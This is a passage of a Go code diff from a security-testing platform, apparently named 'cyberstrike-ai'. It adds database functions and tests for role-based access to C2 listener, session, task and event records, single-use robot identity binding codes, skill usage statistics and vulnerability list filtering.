access := RBACListAccess{UserID: "u1", Scope: RBACScopeOwn} + listeners, err := db.ListC2ListenersForAccess(access, "") + if err != nil { + t.Fatal(err) + } + if len(listeners) != 3 { + t.Fatalf("listeners = %#v, want 3 owned listeners including unbound", listeners) + } + listeners, err = db.ListC2ListenersForAccess(access, "p1") + if err != nil { + t.Fatal(err) + } + if len(listeners) != 1 || listeners[0].ID != l1.ID { + t.Fatalf("listeners scoped to p1 = %#v, want only %s", listeners, l1.ID) + } + listeners, err = db.ListC2ListenersForAccess(access, ProjectFilterUnbound) + if err != nil { + t.Fatal(err) + } + if len(listeners) != 1 || listeners[0].ID != l4.ID { + t.Fatalf("unbound listeners = %#v, want only %s", listeners, l4.ID) + } + sessions, err := db.ListC2SessionsForAccess(ListC2SessionsFilter{}, access) + if err != nil { + t.Fatal(err) + } + if len(sessions) != 3 { + t.Fatalf("sessions = %#v, want 3 owned sessions including unbound", sessions) + } + sessions, err = db.ListC2SessionsForAccess(ListC2SessionsFilter{ProjectID: "p1"}, access) + if err != nil { + t.Fatal(err) + } + if len(sessions) != 1 || sessions[0].ID != "s_visible" { + t.Fatalf("sessions scoped to p1 = %#v, want only s_visible", sessions) + } + sessions, err = db.ListC2SessionsForAccess(ListC2SessionsFilter{ProjectID: ProjectFilterUnbound}, access) + if err != nil { + t.Fatal(err) + } + if len(sessions) != 1 || sessions[0].ID != "s_unbound" { + t.Fatalf("unbound sessions = %#v, want only s_unbound", sessions) + } + tasks, err := db.ListC2TasksForAccess(ListC2TasksFilter{}, access) + if err != nil { + t.Fatal(err) + } + if len(tasks) != 3 { + t.Fatalf("tasks = %#v, want 3 owned tasks including unbound", tasks) + } + tasks, err = db.ListC2TasksForAccess(ListC2TasksFilter{ProjectID: "p1"}, access) + if err != nil { + t.Fatal(err) + } + if len(tasks) != 1 || tasks[0].ID != "t_visible" { + t.Fatalf("tasks scoped to p1 = %#v, want only t_visible", tasks) + } + tasks, err = db.ListC2TasksForAccess(ListC2TasksFilter{ProjectID: ProjectFilterUnbound}, access) + if err != nil { + t.Fatal(err) + } + if len(tasks) != 1 || tasks[0].ID != "t_unbound" { + t.Fatalf("unbound tasks = %#v, want only t_unbound", tasks) + } + events, err := db.ListC2EventsForAccess(ListC2EventsFilter{}, access) + if err != nil { + t.Fatal(err) + } + if len(events) != 3 { + t.Fatalf("events = %#v, want 3 owned events including unbound", events) + } + events, err = db.ListC2EventsForAccess(ListC2EventsFilter{ProjectID: "p1"}, access) + if err != nil { + t.Fatal(err) + } + if len(events) != 1 || events[0].ID != "e_visible" { + t.Fatalf("events scoped to p1 = %#v, want only e_visible", events) + } + events, err = db.ListC2EventsForAccess(ListC2EventsFilter{ProjectID: ProjectFilterUnbound}, access) + if err != nil { + t.Fatal(err) + } + if len(events) != 1 || events[0].ID != "e_unbound" { + t.Fatalf("unbound events = %#v, want only e_unbound", events) + } + if !db.UserCanAccessResource("u1", RBACScopeOwn, "c2_task", "t_visible") { + t.Fatalf("expected listener ownership to allow task detail") + } + if db.UserCanAccessResource("u1", RBACScopeOwn, "c2_task", "t_hidden") { + t.Fatalf("unexpected access to hidden task") + } +} + +func TestRBACC2AssignedDeleteIsScoped(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("u1", "User 1", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + now := time.Now() + if err := db.CreateC2Listener(&C2Listener{ID: "l_assigned", Name: "assigned", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9001, CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Listener(&C2Listener{ID: "l_hidden", Name: "hidden", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9002, CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AssignResourceToUser(user.ID, "c2_listener", "l_assigned"); err != nil { + t.Fatal(err) + } + for _, row := range []struct { + sessionID string + listener string + taskID string + eventID string + }{ + {"s_assigned", "l_assigned", "t_assigned", "e_assigned"}, + {"s_hidden", "l_hidden", "t_hidden", "e_hidden"}, + } { + if err := db.UpsertC2Session(&C2Session{ID: row.sessionID, ListenerID: row.listener, ImplantUUID: row.sessionID + "_uuid", Status: "active", FirstSeenAt: now, LastCheckIn: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Task(&C2Task{ID: row.taskID, SessionID: row.sessionID, TaskType: "shell", Status: "queued", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AppendC2Event(&C2Event{ID: row.eventID, Level: "info", Category: "task", SessionID: row.sessionID, TaskID: row.taskID, Message: row.eventID, CreatedAt: now}); err != nil { + t.Fatal(err) + } + } + access := RBACListAccess{UserID: user.ID, Scope: RBACScopeAssigned} + n, err := db.DeleteC2TasksByIDsForAccess([]string{"t_assigned", "t_hidden"}, access) + if err != nil { + t.Fatal(err) + } + if n != 1 { + t.Fatalf("deleted tasks = %d, want 1", n) + } + if task, _ := db.GetC2Task("t_hidden"); task == nil { + t.Fatalf("hidden task was deleted") + } + n, err = db.DeleteC2EventsByIDsForAccess([]string{"e_assigned", "e_hidden"}, access) + if err != nil { + t.Fatal(err) + } + if n != 1 { + t.Fatalf("deleted events = %d, want 1", n) + } + hiddenEvents, err := db.ListC2Events(ListC2EventsFilter{TaskID: "t_hidden"}) + if err != nil { + t.Fatal(err) + } + if len(hiddenEvents) != 1 { + t.Fatalf("hidden event count = %d, want 1", len(hiddenEvents)) + } +} + +func TestRBACAssignmentLabelsAndWeakTitles(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("label-member", "Label Member", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + project, err := db.CreateProject(&Project{Name: "Alpha Project"}) + if err != nil { + t.Fatal(err) + } + conversation, err := db.CreateConversation("1", ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + if _, err := db.AssignResourcesToUser(user.ID, "project", []string{project.ID}); err != nil { + t.Fatal(err) + } + + options, err := db.ListAssignableRBACResources("conversation", "", 10) + if err != nil { + t.Fatal(err) + } + if len(options) == 0 { + t.Fatal("expected conversation options") + } + for _, option := range options { + if option.ID == conversation.ID && !strings.Contains(option.Label, "1 ·") { + t.Fatalf("weak conversation label = %q, want suffix with short id", option.Label) + } + } + + rows, err := db.ListRBACResourceAssignments(user.ID) + if err != nil { + t.Fatal(err) + } + if len(rows) != 1 { + t.Fatalf("assignments = %#v, want 1", rows) + } + if rows[0].ResourceLabel != "Alpha Project" { + t.Fatalf("assignment label = %q, want Alpha Project", rows[0].ResourceLabel) + } +} + +func TestDeleteRBACResourceAssignmentWithDetails(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("revoke-member", "Revoke Member", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + project, err := db.CreateProject(&Project{Name: "Revoked Project"}) + if err != nil { + t.Fatal(err) + } + if _, err := db.AssignResourcesToUser(user.ID, "project", []string{project.ID}); err != nil { + t.Fatal(err) + } + rows, err := db.ListRBACResourceAssignments(user.ID) + if err != nil { + t.Fatal(err) + } + if len(rows) != 1 { + t.Fatalf("assignments = %#v, want 1", rows) + } + + deleted, err := db.DeleteRBACResourceAssignmentWithDetails(rows[0].ID) + if err != nil { + t.Fatal(err) + } + if deleted.ID != rows[0].ID || deleted.UserID != user.ID || deleted.ResourceType != "project" || deleted.ResourceID != project.ID { + t.Fatalf("deleted assignment = %#v", deleted) + } + remaining, err := db.ListRBACResourceAssignments(user.ID) + if err != nil { + t.Fatal(err) + } + if len(remaining) != 0 { + t.Fatalf("remaining assignments = %#v, want none", remaining) + } + if _, err := db.DeleteRBACResourceAssignmentWithDetails(rows[0].ID); err == nil { + t.Fatal("second delete unexpectedly succeeded") + } +} diff --git a/internal/database/robot_identity.go b/internal/database/robot_identity.go new file mode 100644 index 00000000..a7e0039e --- /dev/null +++ b/internal/database/robot_identity.go @@ -0,0 +1,174 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" + + "github.com/google/uuid" +) + +// RobotUserBinding maps one tenant-scoped platform identity to one RBAC user. +// external_user_id must be derived from the verified platform event, never +// from user-controlled message content. +type RobotUserBinding struct { + ID string `json:"id"` + Platform string `json:"platform"` + ExternalUserID string `json:"externalUserId"` + RBACUserID string `json:"rbacUserId"` + Enabled bool `json:"enabled"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +func normalizeRobotIdentity(platform, externalUserID string) (string, string, error) { + platform = strings.ToLower(strings.TrimSpace(platform)) + externalUserID = strings.TrimSpace(externalUserID) + if platform == "" || externalUserID == "" { + return "", "", fmt.Errorf("robot platform and external user identity are required") + } + return platform, externalUserID, nil +} + +func (db *DB) CreateRobotBindingCode(userID, codeHash string, expiresAt time.Time) error { + userID = strings.TrimSpace(userID) + codeHash = strings.TrimSpace(codeHash) + if userID == "" || codeHash == "" || !expiresAt.After(time.Now()) { + return fmt.Errorf("invalid robot binding code") + } + now := time.Now() + tx, err := db.Begin() + if err != nil { + return err + } + defer func() { _ = tx.Rollback() }() + // Keep only the newest active code per user and remove expired/used secrets. + if _, err = tx.Exec(`DELETE FROM robot_binding_codes WHERE rbac_user_id = ? OR expires_at <= ? OR used_at IS NOT NULL`, userID, now); err != nil { + return err + } + if _, err = tx.Exec(`INSERT INTO robot_binding_codes (code_hash, rbac_user_id, expires_at, created_at) VALUES (?, ?, ?, ?)`, codeHash, userID, expiresAt, now); err != nil { + return err + } + return tx.Commit() +} + +// ConsumeRobotBindingCode atomically consumes a single-use code and binds the +// verified platform identity. Existing bindings are deliberately replaced so +// users can recover from stale or incorrect associations with a fresh code. +func (db *DB) ConsumeRobotBindingCode(platform, externalUserID, codeHash string) (*RBACUser, error) { + platform, externalUserID, err := normalizeRobotIdentity(platform, externalUserID) + if err != nil { + return nil, err + } + codeHash = strings.TrimSpace(codeHash) + if codeHash == "" { + return nil, fmt.Errorf("binding code is required") + } + tx, err := db.Begin() + if err != nil { + return nil, err + } + defer func() { _ = tx.Rollback() }() + + var userID string + now := time.Now() + if err = tx.QueryRow(` + SELECT c.rbac_user_id + FROM robot_binding_codes c + JOIN rbac_users u ON u.id = c.rbac_user_id + WHERE c.code_hash = ? AND c.used_at IS NULL AND c.expires_at > ? AND u.enabled = 1 + `, codeHash, now).Scan(&userID); err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("binding code is invalid or expired") + } + return nil, err + } + result, err := tx.Exec(`UPDATE robot_binding_codes SET used_at = ? WHERE code_hash = ? AND used_at IS NULL`, now, codeHash) + if err != nil { + return nil, err + } + if affected, _ := result.RowsAffected(); affected != 1 { + return nil, fmt.Errorf("binding code has already been used") + } + if _, err = tx.Exec(` + INSERT INTO robot_user_bindings (id, platform, external_user_id, rbac_user_id, enabled, created_at, updated_at) + VALUES (?, ?, ?, ?, 1, ?, ?) + ON CONFLICT(platform, external_user_id) DO UPDATE SET + rbac_user_id = excluded.rbac_user_id, + enabled = 1, + updated_at = excluded.updated_at + `, uuid.New().String(), platform, externalUserID, userID, now, now); err != nil { + return nil, err + } + if err = tx.Commit(); err != nil { + return nil, err + } + return db.GetRBACUserByID(userID) +} + +func (db *DB) ResolveRobotRBACAccess(platform, externalUserID string) (*RBACAccess, error) { + platform, externalUserID, err := normalizeRobotIdentity(platform, externalUserID) + if err != nil { + return nil, err + } + var userID string + err = db.QueryRow(` + SELECT b.rbac_user_id + FROM robot_user_bindings b + JOIN rbac_users u ON u.id = b.rbac_user_id + WHERE b.platform = ? AND b.external_user_id = ? AND b.enabled = 1 AND u.enabled = 1 + `, platform, externalUserID).Scan(&userID) + if err == sql.ErrNoRows { + return nil, fmt.Errorf("robot identity is not bound") + } + if err != nil { + return nil, err + } + return db.ResolveRBACAccess(userID) +} + +func (db *DB) ListRobotUserBindings(userID string) ([]RobotUserBinding, error) { + rows, err := db.Query(` + SELECT id, platform, external_user_id, rbac_user_id, enabled, created_at, updated_at + FROM robot_user_bindings WHERE rbac_user_id = ? ORDER BY updated_at DESC + `, strings.TrimSpace(userID)) + if err != nil { + return nil, err + } + defer rows.Close() + var out []RobotUserBinding + for rows.Next() { + var b RobotUserBinding + var enabled int + var createdAt, updatedAt string + if err := rows.Scan(&b.ID, &b.Platform, &b.ExternalUserID, &b.RBACUserID, &enabled, &createdAt, &updatedAt); err != nil { + return nil, err + } + b.Enabled = enabled != 0 + b.CreatedAt = parseDBTime(createdAt) + b.UpdatedAt = parseDBTime(updatedAt) + out = append(out, b) + } + return out, rows.Err() +} + +func (db *DB) DeleteRobotUserBindingForUser(bindingID, userID string) error { + result, err := db.Exec(`DELETE FROM robot_user_bindings WHERE id = ? AND rbac_user_id = ?`, strings.TrimSpace(bindingID), strings.TrimSpace(userID)) + if err != nil { + return err + } + if affected, _ := result.RowsAffected(); affected != 1 { + return sql.ErrNoRows + } + return nil +} + +func (db *DB) DeleteRobotIdentityBinding(platform, externalUserID string) error { + platform, externalUserID, err := normalizeRobotIdentity(platform, externalUserID) + if err != nil { + return err + } + _, err = db.Exec(`DELETE FROM robot_user_bindings WHERE platform = ? AND external_user_id = ?`, platform, externalUserID) + return err +} diff --git a/internal/database/robot_identity_test.go b/internal/database/robot_identity_test.go new file mode 100644 index 00000000..60a70c46 --- /dev/null +++ b/internal/database/robot_identity_test.go @@ -0,0 +1,89 @@ +package database_test + +import ( + "testing" + "time" + + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/security" + + "go.uber.org/zap" +) + +func TestRobotBindingCodeIsSingleUseAndPermissionsAreResolvedLive(t *testing.T) { + db, err := database.NewDB(t.TempDir()+"/robot-identity.db", zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + if err := db.BootstrapRBAC("hash", security.PermissionCatalog); err != nil { + t.Fatal(err) + } + user, err := db.CreateRBACUser("bound-user", "Bound User", "hash", true, []string{database.RBACSystemRoleOperator}) + if err != nil { + t.Fatal(err) + } + if err := db.CreateRobotBindingCode(user.ID, "code-hash", time.Now().Add(time.Minute)); err != nil { + t.Fatal(err) + } + bound, err := db.ConsumeRobotBindingCode("LARK", "t:tenant|u:user", "code-hash") + if err != nil || bound.ID != user.ID { + t.Fatalf("consume binding code: user=%v err=%v", bound, err) + } + if _, err := db.ConsumeRobotBindingCode("lark", "t:tenant|u:other", "code-hash"); err == nil { + t.Fatal("single-use binding code was accepted twice") + } + access, err := db.ResolveRobotRBACAccess("lark", "t:tenant|u:user") + if err != nil || !access.Permissions["agent:execute"] { + t.Fatalf("resolved access does not include live role permissions: %#v err=%v", access, err) + } + disabled := false + if err := db.UpdateRBACUser(user.ID, user.DisplayName, &disabled, nil); err != nil { + t.Fatal(err) + } + if _, err := db.ResolveRobotRBACAccess("lark", "t:tenant|u:user"); err == nil { + t.Fatal("disabled RBAC user retained robot access") + } +} + +func TestRobotBindingCodeExpiryAndOwnerScopedRevocation(t *testing.T) { + db, err := database.NewDB(t.TempDir()+"/robot-revoke.db", zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + if err := db.BootstrapRBAC("hash", security.PermissionCatalog); err != nil { + t.Fatal(err) + } + u1, _ := db.CreateRBACUser("binding-owner", "Owner", "hash", true, nil) + u2, _ := db.CreateRBACUser("binding-other", "Other", "hash", true, nil) + now := time.Now() + if _, err := db.Exec(`INSERT INTO robot_binding_codes (code_hash, rbac_user_id, expires_at, created_at) VALUES (?, ?, ?, ?)`, "expired-hash", u1.ID, now.Add(-time.Minute), now.Add(-2*time.Minute)); err != nil { + t.Fatal(err) + } + if _, err := db.ConsumeRobotBindingCode("wecom", "t:corp|u:expired", "expired-hash"); err == nil { + t.Fatal("expired binding code was accepted") + } + if err := db.CreateRobotBindingCode(u1.ID, "valid-hash", time.Now().Add(time.Minute)); err != nil { + t.Fatal(err) + } + if _, err := db.ConsumeRobotBindingCode("wecom", "t:corp|u:one", "valid-hash"); err != nil { + t.Fatal(err) + } + bindings, err := db.ListRobotUserBindings(u1.ID) + if err != nil || len(bindings) != 1 { + t.Fatalf("bindings=%v err=%v", bindings, err) + } + if err := db.DeleteRobotUserBindingForUser(bindings[0].ID, u2.ID); err == nil { + t.Fatal("another user revoked a binding they do not own") + } + if _, err := db.ResolveRobotRBACAccess("wecom", "t:corp|u:one"); err != nil { + t.Fatalf("unauthorized revocation changed binding: %v", err) + } + if err := db.DeleteRobotUserBindingForUser(bindings[0].ID, u1.ID); err != nil { + t.Fatal(err) + } + if _, err := db.ResolveRobotRBACAccess("wecom", "t:corp|u:one"); err == nil { + t.Fatal("revoked binding still resolves") + } +} diff --git a/internal/database/robot_session.go b/internal/database/robot_session.go new file mode 100644 index 00000000..cd855f8b --- /dev/null +++ b/internal/database/robot_session.go @@ -0,0 +1,93 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" +) + +// RobotSessionBinding 机器人会话绑定信息。 +type RobotSessionBinding struct { + SessionKey string + ConversationID string + RoleName string + AgentMode string + UpdatedAt time.Time +} + +// GetRobotSessionBinding 按 session_key 获取机器人会话绑定。 +func (db *DB) GetRobotSessionBinding(sessionKey string) (*RobotSessionBinding, error) { + sessionKey = strings.TrimSpace(sessionKey) + if sessionKey == "" { + return nil, nil + } + var b RobotSessionBinding + var updatedAt string + err := db.QueryRow( + "SELECT session_key, conversation_id, role_name, agent_mode, updated_at FROM robot_user_sessions WHERE session_key = ?", + sessionKey, + ).Scan(&b.SessionKey, &b.ConversationID, &b.RoleName, &b.AgentMode, &updatedAt) + if err != nil { + if err == sql.ErrNoRows { + return nil, nil + } + return nil, fmt.Errorf("查询机器人会话绑定失败: %w", err) + } + if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt); e == nil { + b.UpdatedAt = t + } else if t, e := time.Parse("2006-01-02 15:04:05", updatedAt); e == nil { + b.UpdatedAt = t + } else { + b.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + if strings.TrimSpace(b.RoleName) == "" { + b.RoleName = "默认" + } + if strings.TrimSpace(b.AgentMode) == "" { + b.AgentMode = "eino_single" + } + return &b, nil +} + +// UpsertRobotSessionBinding 写入或更新机器人会话绑定(包含角色)。 +func (db *DB) UpsertRobotSessionBinding(sessionKey, conversationID, roleName, agentMode string) error { + sessionKey = strings.TrimSpace(sessionKey) + conversationID = strings.TrimSpace(conversationID) + roleName = strings.TrimSpace(roleName) + agentMode = strings.TrimSpace(agentMode) + if sessionKey == "" || conversationID == "" { + return nil + } + if roleName == "" { + roleName = "默认" + } + if agentMode == "" { + agentMode = "eino_single" + } + _, err := db.Exec(` + INSERT INTO robot_user_sessions (session_key, conversation_id, role_name, agent_mode, updated_at) + VALUES (?, ?, ?, ?, ?) + ON CONFLICT(session_key) DO UPDATE SET + conversation_id = excluded.conversation_id, + role_name = excluded.role_name, + agent_mode = excluded.agent_mode, + updated_at = excluded.updated_at + `, sessionKey, conversationID, roleName, agentMode, time.Now()) + if err != nil { + return fmt.Errorf("写入机器人会话绑定失败: %w", err) + } + return nil +} + +// DeleteRobotSessionBinding 删除机器人会话绑定。 +func (db *DB) DeleteRobotSessionBinding(sessionKey string) error { + sessionKey = strings.TrimSpace(sessionKey) + if sessionKey == "" { + return nil + } + if _, err := db.Exec("DELETE FROM robot_user_sessions WHERE session_key = ?", sessionKey); err != nil { + return fmt.Errorf("删除机器人会话绑定失败: %w", err) + } + return nil +} diff --git a/internal/database/skill_stats.go b/internal/database/skill_stats.go new file mode 100644 index 00000000..24e15585 --- /dev/null +++ b/internal/database/skill_stats.go @@ -0,0 +1,142 @@ +package database + +import ( + "database/sql" + "time" + + "go.uber.org/zap" +) + +// SkillStats Skills统计信息 +type SkillStats struct { + SkillName string + TotalCalls int + SuccessCalls int + FailedCalls int + LastCallTime *time.Time +} + +// SaveSkillStats 保存Skills统计信息 +func (db *DB) SaveSkillStats(skillName string, stats *SkillStats) error { + var lastCallTime sql.NullTime + if stats.LastCallTime != nil { + lastCallTime = sql.NullTime{Time: *stats.LastCallTime, Valid: true} + } + + query := ` + INSERT OR REPLACE INTO skill_stats + (skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at) + VALUES (?, ?, ?, ?, ?, ?) + ` + + _, err := db.Exec(query, + skillName, + stats.TotalCalls, + stats.SuccessCalls, + stats.FailedCalls, + lastCallTime, + time.Now(), + ) + + if err != nil { + db.logger.Error("保存Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName)) + return err + } + + return nil +} + +// LoadSkillStats 加载所有Skills统计信息 +func (db *DB) LoadSkillStats() (map[string]*SkillStats, error) { + query := ` + SELECT skill_name, total_calls, success_calls, failed_calls, last_call_time + FROM skill_stats + ` + + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + + stats := make(map[string]*SkillStats) + for rows.Next() { + var stat SkillStats + var lastCallTime sql.NullTime + + err := rows.Scan( + &stat.SkillName, + &stat.TotalCalls, + &stat.SuccessCalls, + &stat.FailedCalls, + &lastCallTime, + ) + if err != nil { + db.logger.Warn("加载Skills统计信息失败", zap.Error(err)) + continue + } + + if lastCallTime.Valid { + stat.LastCallTime = &lastCallTime.Time + } + + stats[stat.SkillName] = &stat + } + + return stats, nil +} + +// UpdateSkillStats 更新Skills统计信息(累加模式) +func (db *DB) UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error { + var lastCallTimeSQL sql.NullTime + if lastCallTime != nil { + lastCallTimeSQL = sql.NullTime{Time: *lastCallTime, Valid: true} + } + + query := ` + INSERT INTO skill_stats (skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at) + VALUES (?, ?, ?, ?, ?, ?) + ON CONFLICT(skill_name) DO UPDATE SET + total_calls = total_calls + ?, + success_calls = success_calls + ?, + failed_calls = failed_calls + ?, + last_call_time = COALESCE(?, last_call_time), + updated_at = ? + ` + + _, err := db.Exec(query, + skillName, totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(), + totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(), + ) + + if err != nil { + db.logger.Error("更新Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName)) + return err + } + + return nil +} + +// ClearSkillStats 清空所有Skills统计信息 +func (db *DB) ClearSkillStats() error { + query := `DELETE FROM skill_stats` + _, err := db.Exec(query) + if err != nil { + db.logger.Error("清空Skills统计信息失败", zap.Error(err)) + return err + } + db.logger.Info("已清空所有Skills统计信息") + return nil +} + +// ClearSkillStatsByName 清空指定skill的统计信息 +func (db *DB) ClearSkillStatsByName(skillName string) error { + query := `DELETE FROM skill_stats WHERE skill_name = ?` + _, err := db.Exec(query, skillName) + if err != nil { + db.logger.Error("清空指定skill统计信息失败", zap.Error(err), zap.String("skillName", skillName)) + return err + } + db.logger.Info("已清空指定skill统计信息", zap.String("skillName", skillName)) + return nil +} diff --git a/internal/database/sqltime.go b/internal/database/sqltime.go new file mode 100644 index 00000000..8089e44c --- /dev/null +++ b/internal/database/sqltime.go @@ -0,0 +1,33 @@ +package database + +import ( + "errors" + "strings" + "time" +) + +// formatSQLiteUTC stores instants as UTC RFC3339 for consistent SQLite reads/writes. +func formatSQLiteUTC(t time.Time) string { + return t.UTC().Format(time.RFC3339Nano) +} + +// sqliteEpochGE returns SQL comparing column to param as Unix seconds (timezone-safe). +func sqliteEpochGE(column, op string) string { + return "strftime('%s', " + column + ") " + op + " strftime('%s', ?)" +} + +// ParseRFC3339Time parses API/query timestamps (RFC3339 or RFC3339Nano). +func ParseRFC3339Time(value string) (time.Time, error) { + value = strings.TrimSpace(value) + if value == "" { + return time.Time{}, errors.New("empty time value") + } + if t, err := time.Parse(time.RFC3339Nano, value); err == nil { + return t.UTC(), nil + } + t, err := time.Parse(time.RFC3339, value) + if err != nil { + return time.Time{}, err + } + return t.UTC(), nil +} diff --git a/internal/database/tool_execution_args_lookup.go b/internal/database/tool_execution_args_lookup.go new file mode 100644 index 00000000..cc3a0a63 --- /dev/null +++ b/internal/database/tool_execution_args_lookup.go @@ -0,0 +1,57 @@ +package database + +import ( + "database/sql" + "encoding/json" + "fmt" + "strings" + "time" +) + +// FindNearestToolExecutionArguments returns the arguments for the execution record +// closest to a persisted tool_call detail. Eino can persist a tool_call with empty +// model arguments while the monitor execution row still has the real command/URL. +func (db *DB) FindNearestToolExecutionArguments(conversationID, toolName string, at time.Time, window time.Duration) (string, map[string]interface{}, error) { + conversationID = strings.TrimSpace(conversationID) + toolName = strings.TrimSpace(toolName) + if db == nil || conversationID == "" || toolName == "" || at.IsZero() { + return "", nil, sql.ErrNoRows + } + if window <= 0 { + window = 5 * time.Second + } + names := []string{toolName} + if !strings.Contains(toolName, "::") { + names = append(names, "eino_fs::"+toolName) + } + start := at.Add(-window) + end := at.Add(window) + rows, err := db.Query(` +SELECT id, arguments +FROM tool_executions +WHERE conversation_id = ? + AND tool_name IN (?, ?) + AND julianday(start_time) BETWEEN julianday(?) AND julianday(?) +ORDER BY ABS(julianday(start_time) - julianday(?)) ASC, start_time ASC +LIMIT 1`, conversationID, names[0], names[len(names)-1], start, end, at) + if err != nil { + return "", nil, err + } + defer rows.Close() + if !rows.Next() { + if err := rows.Err(); err != nil { + return "", nil, err + } + return "", nil, sql.ErrNoRows + } + var id string + var raw string + if err := rows.Scan(&id, &raw); err != nil { + return "", nil, err + } + var args map[string]interface{} + if err := json.Unmarshal([]byte(raw), &args); err != nil { + return "", nil, fmt.Errorf("parse tool execution arguments: %w", err) + } + return strings.TrimSpace(id), args, nil +} diff --git a/internal/database/vulnerability.go b/internal/database/vulnerability.go new file mode 100644 index 00000000..2eede0fa --- /dev/null +++ b/internal/database/vulnerability.go @@ -0,0 +1,547 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// VulnerabilityListFilter 列表/统计/导出共用的筛选条件 +type VulnerabilityListFilter struct { + ID string + Search string // 关键词模糊匹配(标题、描述、类型、目标等) + ConversationID string + ProjectID string + Severity string + Status string + TaskID string + ConversationTag string + TaskTag string +} + +type RBACListAccess struct { + UserID string + Scope string +} + +func escapeVulnerabilityLikePattern(s string) string { + s = strings.ReplaceAll(s, `\`, `\\`) + s = strings.ReplaceAll(s, `%`, `\%`) + s = strings.ReplaceAll(s, `_`, `\_`) + return "%" + s + "%" +} + +func (f VulnerabilityListFilter) appendWhere(query string, args []interface{}) (string, []interface{}) { + if f.ID != "" { + query += " AND id = ?" + args = append(args, f.ID) + } + if f.ConversationID != "" { + query += " AND conversation_id = ?" + args = append(args, f.ConversationID) + } + if f.ProjectID != "" { + query += " AND project_id = ?" + args = append(args, f.ProjectID) + } + if f.TaskID != "" { + query += " AND EXISTS (SELECT 1 FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id AND (bt.id = ? OR bt.queue_id = ?))" + args = append(args, f.TaskID, f.TaskID) + } + if f.ConversationTag != "" { + query += " AND conversation_tag = ?" + args = append(args, f.ConversationTag) + } + if f.TaskTag != "" { + query += " AND task_tag = ?" + args = append(args, f.TaskTag) + } + if f.Severity != "" { + query += " AND severity = ?" + args = append(args, f.Severity) + } + if f.Status != "" { + query += " AND status = ?" + args = append(args, f.Status) + } + search := strings.TrimSpace(f.Search) + if search != "" { + pattern := escapeVulnerabilityLikePattern(search) + query += ` AND ( + LOWER(id) LIKE LOWER(?) OR + LOWER(title) LIKE LOWER(?) OR + LOWER(COALESCE(description, '')) LIKE LOWER(?) OR + LOWER(COALESCE(vulnerability_type, '')) LIKE LOWER(?) OR + LOWER(COALESCE(target, '')) LIKE LOWER(?) OR + LOWER(COALESCE(preconditions, '')) LIKE LOWER(?) OR + LOWER(COALESCE(reproduction_steps, '')) LIKE LOWER(?) OR + LOWER(COALESCE(evidence, '')) LIKE LOWER(?) OR + LOWER(COALESCE(impact, '')) LIKE LOWER(?) OR + LOWER(COALESCE(recommendation, '')) LIKE LOWER(?) OR + LOWER(COALESCE(retest_notes, '')) LIKE LOWER(?) OR + LOWER(COALESCE(conversation_id, '')) LIKE LOWER(?) OR + LOWER(COALESCE(conversation_tag, '')) LIKE LOWER(?) OR + LOWER(COALESCE(task_tag, '')) LIKE LOWER(?) + )` + for i := 0; i < 14; i++ { + args = append(args, pattern) + } + } + return query, args +} + +func appendVulnerabilityAccessFilter(query string, args []interface{}, access RBACListAccess) (string, []interface{}) { + userID := strings.TrimSpace(access.UserID) + if userID == "" || access.Scope == RBACScopeAll { + return query, args + } + query += ` AND ( + owner_user_id = ? + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'vulnerability' AND ra.resource_id = vulnerabilities.id + ) + OR ( + project_id IS NOT NULL AND project_id <> '' AND ( + EXISTS (SELECT 1 FROM projects p WHERE p.id = vulnerabilities.project_id AND p.owner_user_id = ?) + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments pra + WHERE pra.user_id = ? AND pra.resource_type = 'project' AND pra.resource_id = vulnerabilities.project_id + ) + ) + ) + OR ( + conversation_id IS NOT NULL AND conversation_id <> '' AND ( + EXISTS (SELECT 1 FROM conversations c WHERE c.id = vulnerabilities.conversation_id AND c.owner_user_id = ?) + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments cra + WHERE cra.user_id = ? AND cra.resource_type = 'conversation' AND cra.resource_id = vulnerabilities.conversation_id + ) + ) + ) + )` + args = append(args, userID, userID, userID, userID, userID, userID) + return query, args +} + +// Vulnerability 漏洞 +type Vulnerability struct { + ID string `json:"id"` + ConversationID string `json:"conversation_id"` + ProjectID string `json:"project_id,omitempty"` + ConversationTag string `json:"conversation_tag,omitempty"` + TaskTag string `json:"task_tag,omitempty"` + TaskID string `json:"task_id,omitempty"` + TaskQueueID string 